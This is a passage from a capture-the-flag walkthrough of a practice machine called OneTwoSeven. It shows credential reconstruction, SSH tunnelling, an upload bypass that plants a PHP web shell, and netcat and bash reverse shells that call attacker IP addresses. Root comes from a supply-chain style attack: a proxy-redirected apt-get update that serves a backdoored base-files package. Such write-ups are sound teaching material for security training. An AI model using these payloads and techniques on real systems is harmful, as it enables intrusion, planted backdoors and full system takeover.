Oh, what? We can’t access that port yet. Because it’s running locally. We successfully gathered all information from /var/www/html-admin directory. Next, we will gather some information from /var/www/html directory. As I said, if we directly generate a symlink for this directory, it would redirect to home page. What about generating symbolic links for .php pages? It might be useful.
There are 4 php pages on web app. But these are interesting:
- index.php
- stats.php
- signup.php
By the way, we can’t directly fetch them as .php file. Because, there is a restriction about opening .php files. So, we will change their extensions to .php1 or something like this. In addition, converting these .php files to .php1 files will allow reading their content without parsing them. We will inspect their source codes.
index.php1:
symlink /var/www/html/index.php index.php1
Nothing. It will enable admin URL if SERVER_ADDR equal to “127.0.0.1”.
stats.php1:
symlink /var/www/html/stats.php stats.php1
Nothing useful. It is including a txt file for showing server stats.
signup.php1:
symlink /var/www/html/signup.php signup.php1
Bingo! As you see, these lines are related with how are these sftp credentials generating.
If we replicate same steps with setting $ip variable as 127.0.0.1, we can find sftp password of that user.
onetwoseven.php:
<?php
function username() { $ip = '127.0.0.1'; return "ots-" . substr(str_replace('=','',base64_encode(substr(md5($ip),0,8))),3); }
function password() { $ip = '127.0.0.1'; return substr(md5($ip),0,8); }
echo username() . "\n" . password() . "\n";
?>
output:
ots-yODc2NGQ
f528764d
Username is identical with first entry of passwd file. Password must be correct. Authenticating to sftp service with these credentials will grant us a permission to reading that user.txt file.
Let’s validate it.
sftp ots-yODc2NGQ@10.10.10.133
password: f528764d
Cool. We got that user.txt file.
One more step;
cat user.txt
93a4ce6d82bd35da033206ef98b486f4
We got user.txt file. The whole process was not that tricky. All we did is some enumeration. Nothing more. Now, we are aiming to root access.
Part II – Root
From last part, we have some credentials to use.
The sftp service is running at port 22. Also, sftp is subsystem of ssh. What happens if we try to connect the SSH service with previous credentials?
ssh ots-yODc2NGQ@10.10.10.133
ots-yODc2NGQ@10.10.10.133's password:
This service allows sftp connections only.
Connection to 10.10.10.133 closed.
Connection closed. Anyway, it feels like we are on the correct path. If we can access port 60080 with SSH tunnel, we can go further.
Here we go.
ssh -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133
ots-yODc2NGQ@10.10.10.133's password:
This service allows sftp connections only.
Connection to 10.10.10.133 closed.
Also, we can verbose current command with -v parameter. I used that parameter too. I saw that SSH connection can be used over sftp only. That’s bad, right? After reading man page of SSH, I figured out there is useful argument which called -s. If you want to make that connection over subsystem, you should use -s parameter.
ssh -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133 -s sftp
Great! It’s not showing up any messages but it is okay. We are browsing to the port 60080. Before that, editing /etc/hosts file can help if you want to set hostname instead of using “127.0.0.1”.
127.0.0.1 localhost
10.10.10.133 onetwoseven.htb
127.0.0.1 saiyajin
Now, we are ready.
http://saiyajin:60080
Thanks to the creator of the machine, login panel is there. We don’t have to enumerate for login panel.
We have necessary credentials to move forward.
username: ots-admin
password: Homesweethome1
Okay, I’m pretty sure about what we see is admin panel. I just clicked to OTS Users before taking screenshot. There are some modules installed on panel. Uploading a plugin is disabled for security reasons. Great. This admin manager is pretty interesting. I inspected that application.
Here, my findings are:
- If you would like to run a plugin, you need to use “menu.php?addon=addons/addon-name.php” URI.
- If you would like to see content of plugin, you need to use “addon-download.php?addon=addon-name.php” URI.
- Navigating to “OTS Addon Manager” link will show that there are some rewrite rules about “addon-download.php” and “addon-upload.php” files.
- Navigating to “addon-download.php” page returns blank page.
- Navigating to “addon-upload.php” page returns “404 Not Found” page.
Also, you can read the content of ots-man-addon.php page via downloading it.
ots-man-addon.php:
So, we have to deceive the system. At my first try, it took me a while to understand.
This is how your request should look like:
We included addon-upload.php file with addon parameter of addon-download.php file. Also, we attached file to the request. Time to test it!
HTTP/1.1 302 Found
Date: Sun, 09 Jun 2019 01:51:34 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /menu.php
Content-Length: 27
Connection: close
Content-Type: text/plain;charset=UTF-8
File uploaded successfull.y
So, our filename was onetwoseven.php. Now, we can run command with following this URL: http://saiyajin:60080/addons/onetwoseven.php?cmd=ls -la
Okay, we got shell but it is just a web shell. It’s not even active. We should acquire better shell to execute commands and enumerate the system better.
Host machine:
nc -lvp 9292
Target machine:
http://saiyajin:60080/addons/onetwoseven.php?cmd=nc+-e+/bin/sh+10.10.15.127+9292
Host machine output:
Connection from 10.10.10.133:36800
┌─[puck@parrot-lt]─[~/htb/onetwoseven] └──╼ $curl http://localhost:60080/addons/cmd.php?cmd=id uid=35(www-admin-data) gid=35(www-admin-data) groups=35(www-admin-data) curl: (3) URL using bad/illegal format or missing URL ┌─[✗]─[puck@parrot-lt]─[~/htb/onetwoseven] └──╼ $curl -G http://localhost:60080/addons/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
Okay, cool. We got better shell. But it’s not enough. We should beautify it more.
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=linux
Finally, we gained tty shell. Second command is necessary if you would like to use clear command on your shell.
On enumeration process, I just found one cool thing. It was the output of sudo -l command. That command shows which commands are executable for current user as sudo privileges.
Matching Defaults entries for www-admin-data on onetwoseven:
env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy",
mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-admin-data may run the following commands on onetwoseven:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
Very nice, we can run /usr/bin/apt-get update and /usr/bin/apt-get upgrade commands with root privileges. That’s okay. So, we have to inject something to these commands. This part was pretty tricky for me. I read two articles for this part and I will share these articles at end of this blog post. You should read both of these articles. They contain very cool tricks.
If you check output of sudo -l command, you can see that there are some environment variables usable for setting your local machine as proxy server. These are:
- ftp_proxy
- http_proxy
- https_proxy
- no_proxy
Before using these variables, I decided to enumerate apt repositories on the machine.
We can check these repository list with reading sources.list file which is located at /etc/apt directory.
cat /etc/apt/sources.list
# deb cdrom:[devuan_ascii_2.0.0_amd64_netinst]/ ascii main non-free
#deb cdrom:[devuan_ascii_2.0.0_amd64_netinst]/ ascii main non-free
deb http://de.deb.devuan.org/merged ascii main
# deb-src http://de.deb.devuan.org/merged ascii main
deb http://de.deb.devuan.org/merged ascii-security main
# deb-src http://de.deb.devuan.org/merged ascii-security main
deb http://de.deb.devuan.org/merged ascii-updates main
# deb-src http://de.deb.devuan.org/merged ascii-updates main
Some of these lines are commented out. If we run apt-get update command, probably machine will try to connect that host. Then, it will try to find differences between installed application list and target package list. After reading that post, I figured out how it finds the differences.
All of these files are stored as .deb format in repository. Also, repositories have some other files for package controlling. If you would like to update an application, then you must summarize that .deb package file in three different hash format. These are:
- MD5
- SHA1
- SHA256
After doing checksum operation, you have to replace these hash values with hashes on the latest version of that Packages file. It is really necessary. Because, if you want to upgrade an application, it will compare hash values on Packages file with hash values on .deb package file. If hash values don’t match, then upgrading process fails.
Also, you have to compress the Packages file as .gz format. After compressing that file, you must do another checksumming process for both of these Packages and Packages.gz files. These hash values will be stored on Release file. Release file stores all of these Packages files that belongs to other deb applications. Therefore, Release file are stored in top of these repositories. Basically, it stores another Packages files and Packages files stores hashes of .deb packages. Another detail about repositories are sometimes these Release files can be signed with the key of authority of repository. It was a small briefing about how repositories work.
Okay, we got it. Let’s start with executing the update command.
sudo /usr/bin/apt-get update
Err:1 http://packages.onetwoseven.htb/devuan ascii InRelease
Temporary failure resolving 'packages.onetwoseven.htb'
Err:2 http://de.deb.devuan.org/merged ascii InRelease
Temporary failure resolving 'de.deb.devuan.org'
Err:3 http://de.deb.devuan.org/merged ascii-security InRelease
Temporary failure resolving 'de.deb.devuan.org'
Err:4 http://de.deb.devuan.org/merged ascii-updates InRelease
Temporary failure resolving 'de.deb.devuan.org'
Reading package lists... Done
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii/InRelease Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-security/InRelease Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-updates/InRelease Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease Temporary failure resolving 'packages.onetwoseven.htb'
W: Some index files failed to download. They have been ignored, or old ones used instead.
As you see, connection failed. Just inspect that output more careful. At first error, there is another package repository.
packages.onetwoseven.htb
If you try to connect these repositories from your browser, you can see that the one which starts with packages, it fails. Because your browser won’t recognize that hostname. Other one will redirect another URL.
deb.devuan.org
Somehow, we should make that connection possible on target machine. We know that there are some environment variables which can help at this point.
export http_proxy=http://10.10.15.127
Now, it’s time to test it.
sudo /usr/bin/apt-get update
Err:1 http://packages.onetwoseven.htb/devuan ascii InRelease
Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
Err:2 http://de.deb.devuan.org/merged ascii InRelease
Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
Err:3 http://de.deb.devuan.org/merged ascii-security InRelease
Unable to connect to 10.10.15.127:http:
Err:4 http://de.deb.devuan.org/merged ascii-updates InRelease
Unable to connect to 10.10.15.127:http:
Reading package lists... Done
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii/InRelease Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-security/InRelease Unable to connect to 10.10.15.127:http:
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-updates/InRelease Unable to connect to 10.10.15.127:http:
W: Failed to fetch http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
W: Some index files failed to download. They have been ignored, or old ones used instead.
Good, there are some changes on the output. Probably, it tries to connect our http service. Let’s deceive it by running SimpleHTTPServer on local machine.
python2 -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease HTTP/1.1" 404 -
10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://de.deb.devuan.org/merged/dists/ascii/InRelease HTTP/1.1" 404 -
.... other lines ....
10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.xz HTTP/1.1" 404 -
Basically, it tries to fetch some files but these files are not stored in there. We have to build something bigger. Maybe, we should create our personal repositories with given hostnames.
At first, we should edit /etc/hosts file. We should append these lines shown below.
127.0.0.1 packages.onetwoseven.htb
127.0.0.1 de.deb.devuan.org
First step is done. Second step is creating these repositories. At that point, I created two different directories. Because update command fetches update files from two different URLs.
Here’s the directory structure:
If you check output of last update command, you will see that packages.onetwoseven.htb host uses /devuan directory and the other one uses /merged directory. We know that de.deb.devuan.org is real repository. But other one isn’t real. So, we have to fetch same files from that repository for making it real. Then, I fetched these files with wget to merged directory. Okay, we are cool with the real one.
What about the fake one?
The fake repository should be our injection directory. We have to find an application on target machine which belongs to /devuan repository. If we can find one, then we can inject code into debian application package.
Ain’t that cool? We are upgrading an application for real, then we are generating necessary release and packages files for it. Also, we are hiding our surprise for user.
Before finding that application, I removed some Release and Packages file on the real repository that we created. Because if update process can find any differences between repository and application list, then it will try to upgrade these applications too. As a result, if these applications are not stored in pool list of repo, then this process will fail.
Let’s find my precioussss….
dpkg -l | grep 'devuan'
ii base-files 9.9+devuan2.5 all Devuan base system miscellaneous files
ii bash-completion 1:2.1-4.3+devuan1 all programmable completion for the bash shell
ii bsdutils 1:2.29.2-1+devuan2.1 amd64 basic utilities from 4.4BSD-Lite
ii dbus 1.10.22-1+devuan2 amd64 simple interprocess messaging system (daemon and utilities)
ii devuan-baseconf 0.6.4+devuan2.3 all Devuan base config files
...
From the results, I decided to select base-files application. Because, I saw that this file is stored in that real repository. I downloaded “deb” package which has identical version of current installed application.
The real fun begins..
dpkg-deb -R base-files_9.9+devuan2.5_all.deb modified_base_files
We are extract files on the .deb file with this command. After extracting it, we navigate to /DEBIAN directory. Then, we inject our malicious code into postinst file. We selected this file because all of these lines will be executed while running /usr/bin/apt-get upgrade command.
By the way, I switched to Kali Linux at that point. Because, deb is not installed on my operating system. Also, we have to change version on /DEBIAN/control file.
After making these changes, we repack it.
dpkg-deb -b modified_base_files/ base-files_9.9+devuan2.6_all.deb
Cool! We still got some work to do. Let’s create Packages, Packages.gz and Release files.
Packages file:
md5sum base*; sha1sum base*; sha256sum base*;
output:
4889411ad723b5c6d56c7c47ad381cb7 base-files_9.9+devuan2.6_all.deb
338fc54417db2194e2023d721b065ad310fbe4cf base-files_9.9+devuan2.6_all.deb
06a21aa67d8afc106ac14f037a7b9adeabc04e35c09b5e96057dccc2bb8a3ee3 base-files_9.9+devuan2.6_all.deb
We have to save these hashes and size value of file into Packages file as shown below.
Package: base-files
Version: 9.9+devuan2.6
Essential: yes
Installed-Size: 368
Maintainer: Evilham <devuan@evilham.com>
Architecture: all
Replaces: base, dpkg (<= 1.15.0), miscutils
Provides: base
Pre-Depends: awk
Breaks: initscripts (<< 2.88dsf-13.3), sendfile (<< 2.1b.20080616-5.2~)
Description: Devuan base system miscellaneous files
This package contains the basic filesystem hierarchy of a Devuan system, and
several important miscellaneous files, such as /etc/devuan_version,
/etc/host.conf, /etc/issue, /etc/motd, /etc/profile, and others, and the text
of several common licenses in use on Devuan systems.
Description-md5: 7271d96af8aac4f5f37c86c0f2c8cda6
Multi-Arch: foreign
Section: admin
Priority: required
Filename: pool/DEVUAN/main/b/base-files/base-files_9.9+devuan2.6_all.deb
Size: 68796
MD5sum: 4889411ad723b5c6d56c7c47ad381cb7
SHA1: 338fc54417db2194e2023d721b065ad310fbe4cf
SHA256: 06a21aa67d8afc106ac14f037a7b9adeabc04e35c09b5e96057dccc2bb8a3ee3
Packages.gz file:
gzip Packages -c > Packages.gz
Release file:
Let’s gather hash values and file sizes.
md5sum Packages*; sha1sum Packages*; sha256sum Packages*;
output:
55bd31c447c782f4836ed2238a6b066f Packages
8def1f355c5154fe4150e821e57d8743 Packages.gz
ce136bde8a0d91766104881735ae9d4ff40df125 Packages
c3946b74c76880a4b71f147714bacbb2a47e112f Packages.gz
445ba0fe10fcf80433e1725bb80005b69a6946464c8760ad9063dd3b7e527a51 Packages
776053770b7228e18baf41631c6c9c7c95c4d54d2edc9fca30f408f60b175ef4 Packages.gz
ls -la | grep 'Packages*'
-rw-r--r-- 1 root root 967 Haz 8 22:31 Packages
-rw-r--r-- 1 root root 634 Haz 8 22:31 Packages.gz
We need to save these hashes and size values of Packages and Packages.gz files into the Release file as shown below:
Origin: Devuan
Label: ascii
Suite: ascii
Version: 2.0.0
Codename: ascii
Date: Sat, 08 Jun 2019 01:27:04 UTC
Valid-Until: Sat, 15 Jun 2019 01:27:04 UTC
Architectures: alpha amd64 arm64 armel armhf hppa i386 ia64 mips mipsel powerpc ppc64el s390x sparc
Components: main contrib non-free raspi beaglebone droid4 n900 n950 n9 sunxi exynos
MD5Sum:
55bd31c447c782f4836ed2238a6b066f 967 main/binary-amd64/Packages
8def1f355c5154fe4150e821e57d8743 634 main/binary-amd64/Packages.gz
SHA1:
ce136bde8a0d91766104881735ae9d4ff40df125 967 main/binary-amd64/Packages
c3946b74c76880a4b71f147714bacbb2a47e112f 634 main/binary-amd64/Packages.gz
SHA256:
445ba0fe10fcf80433e1725bb80005b69a6946464c8760ad9063dd3b7e527a51 967 main/binary-amd64/Packages
776053770b7228e18baf41631c6c9c7c95c4d54d2edc9fca30f408f60b175ef4 634 main/Packages.gz
Everything is ready. So, we can start the show!
Let’s execute /usr/bin/apt-get update and /usr/bin/apt-get upgrade commands.
As you see, there is only one application ready to upgrade.
base-files
Connection received. But, whoami?
uid=0(root) gid=0(root) groups=0(root)
root.txt = 2d380a25a8e3bfc095abd9e691841048
As a result of long efforts, we finally achieved to root user.
Articles:
- https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/
- https://versprite.com/blog/apt-mitm-package-injection/